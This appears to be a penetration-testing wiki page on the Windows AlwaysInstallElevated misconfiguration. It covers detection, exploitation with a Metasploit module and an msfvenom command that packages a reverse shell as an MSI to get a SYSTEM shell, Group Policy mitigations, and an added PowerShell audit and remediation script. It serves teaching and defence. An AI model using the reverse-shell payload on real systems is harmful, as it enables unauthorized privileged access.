# Always Install Elevated

Always Install Elevated is a registry / GPO setting that allows non-privileged accounts to install Windows Package Installer (MSI) files with SYSTEM permissions. It is usually enabled to reduce the Helpdesk workload when users need software installed.

Command to query registry keys:

```bash
# A value of 0x1 means AlwaysInstallElevated is enabled in that hive.

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-3009b55988f3d484e08dd542bbb20f87e1a44baf%2Fimage.png?alt=media)

WinPEAS can also be used to show this setting as being enabled.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-3723b733aaf28a723e1f18640299f11156bd9ba6%2Fimage.png?alt=media)

## Exploitation

### Metasploit

Metasploit can be used to abuse this privilege.

```bash
use exploit/windows/local/always_install_elevated
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-806511bd9e5139e2e432c79f7b40b832f761d790%2Fimage.png?alt=media)

### Manual - msfvenom

msfvenom can be used to create a reverse shell disguised as an MSI file. When the file is executed / installed, the reverse shell runs as SYSTEM.

```bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<Port> -f msi -o Application.msi
```

Manual install of the MSI file:

![Manual MSI Install](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-790a1c9cab758da82ee8b76ab803ffda9ee44add%2FMSI%20PrivEsc.png?alt=media)

This returns a SYSTEM shell, as shown below.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-bf04dbbb9cd9c0f44cd04508d4982d0cfb99eee3%2Fimage.png?alt=media)

## Mitigations

Ensure that the Windows Installer policy under both of the following Group Policy paths is set to Disabled:

* Computer Configuration\Administrative Templates\Windows Components\Windows Installer
* User Configuration\Administrative Templates\Windows Components\Windows Installer

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-56928de743a00a362bc1b176046486ffc85022fd%2FMSI%20GPO.png?alt=media)
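The following audit script is an added example, not code from the original page: it combines the registry check from the top of the page with the mitigation above, reading both hives, reporting whether the policy is actually effective, and with `-Remediate` writing 0 to both values. The policy only takes effect when both the HKLM and HKCU values are 1, so a single hive set to 1 is a misconfiguration to fix but is not yet exploitable.

```powershell
# Audit / remediation script for AlwaysInstallElevated (added example, not from the page).
# The policy is only effective when BOTH the machine (HKLM) and user (HKCU) values are 1.
param([switch]$Remediate)

$paths = @{
    Machine = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    User    = 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
}

function Get-AlwaysInstallElevatedState {
    $state = @{}
    foreach ($scope in $paths.Keys) {
        $value = Get-ItemProperty -Path $paths[$scope] -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        # A missing key or value behaves the same as disabled (0).
        $state[$scope] = if ($null -eq $value) { 0 } else { [int]$value.AlwaysInstallElevated }
    }
    return $state
}

$state = Get-AlwaysInstallElevatedState
foreach ($scope in $state.Keys) {
    Write-Output ("{0,-8} AlwaysInstallElevated = {1}" -f $scope, $state[$scope])
}

if ($state.Machine -eq 1 -and $state.User -eq 1) {
    Write-Warning 'EFFECTIVE: any user can install MSI packages as SYSTEM.'
} elseif ($state.Machine -eq 1 -or $state.User -eq 1) {
    Write-Warning 'Set in one hive only: not effective yet, but one policy change away.'
} else {
    Write-Output 'AlwaysInstallElevated is disabled.'
}

if ($Remediate) {
    foreach ($scope in $paths.Keys) {
        # Writing 0 matches the GPO "Disabled" state; the HKLM write needs an elevated shell.
        if (-not (Test-Path $paths[$scope])) { New-Item -Path $paths[$scope] -Force | Out-Null }
        Set-ItemProperty -Path $paths[$scope] -Name AlwaysInstallElevated -Value 0 -Type DWord
    }
    Write-Output 'Both values set to 0.'
}
```

If a Group Policy Object enables the policy, fix the GPO itself: a local registry write is overwritten at the next policy refresh.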
